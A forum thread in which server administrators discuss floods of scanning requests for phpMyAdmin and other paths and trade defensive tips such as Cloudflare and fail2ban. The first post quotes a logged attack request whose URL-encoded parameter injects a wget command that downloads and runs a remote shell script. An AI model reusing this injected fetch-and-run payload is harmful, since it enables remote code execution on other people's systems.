Geekzone: technology news, blogs, forums
Guest
Welcome Guest.
You haven't logged in yet. If you don't have an account you can register now.


bigalow

568 posts

Ultimate Geek
+1 received by user: 112


#237757 16-Jun-2018 22:46
Send private message

getting over 1000's of hits looking for phpmyadmin on my servers and i don't have it installed

 

they coming from all different ipsand countries

 

 

 

{37.97.202.44 - - [16/Jun/2018:20:09:12 +1000] "HEAD http://xxxxxxxx:80/phpmyadmin/ HTTP/1.1" 301 268 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36"}

 

and

 

37.74.72.130 - - [16/Jun/2018:18:43:26 +1000] "GET /login.cgi?cli=aa%20aa%27;wget%20http://malware_URL/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$ HTTP/1.1" 301 682 "-" "Hello, World"





 

 

 


Create new topic
michaelmurfy
meow
13580 posts

Uber Geek
+1 received by user: 10910

Moderator
ID Verified
Trusted
Lifetime subscriber

  #2038900 16-Jun-2018 23:19
Send private message

I'm seeing 1000's too on the servers that have Apache / Nginx open to the world.

 

If you can, use Cloudflare and firewall the server off to Cloudflare only.





Michael Murphy | https://murfy.nz
Referral Links: Quic Broadband (use R122101E7CV7Q for free setup)

Are you happy with what you get from Geekzone? Please consider supporting us by subscribing.
Opinions are my own and not the views of my employer.




MadEngineer
4591 posts

Uber Geek
+1 received by user: 2570

Trusted

  #2038908 17-Jun-2018 00:31
Send private message

GET /login.cgi?cli=aa%20aa%27;wget%20http://..............

 

https://www.exploit-db.com/exploits/44760/

 

 

 

 





You're not on Atlantis anymore, Duncan Idaho.

muppet
2643 posts

Uber Geek
+1 received by user: 1660

Trusted

  #2039133 17-Jun-2018 15:09
Send private message

I redirect all attempts to access phpmyadmin to random.php, a lovely script which just pipes /dev/urandom to the script accessing it.




Behodar
11099 posts

Uber Geek
+1 received by user: 6082

Trusted
Lifetime subscriber

  #2039140 17-Jun-2018 15:28
Send private message

No requests for phpmyadmin on my site, but I do have a GET to a random file in /wp-admin (I'm not running WordPress) as well a GET for "up.php" and a HEAD for "configbak.php".

 

A bit pointless when I don't have PHP installed tongue-out


bigalow

568 posts

Ultimate Geek
+1 received by user: 112


  #2039316 17-Jun-2018 23:40
Send private message

this is why i like ssl cause some of these attack scripts can not handle https

 

i use fail2ban to block them too

 

and no point of blocking by user agents cause they are easy to fake

 

eg curl -A "geekzone browser"

 

 





 

 

 


Create new topic








Geekzone Live »

Try automatic live updates from Geekzone directly in your browser, without refreshing the page, with Geekzone Live now.



Are you subscribed to our RSS feed? You can download the latest headlines and summaries from our stories directly to your computer or smartphone by using a feed reader.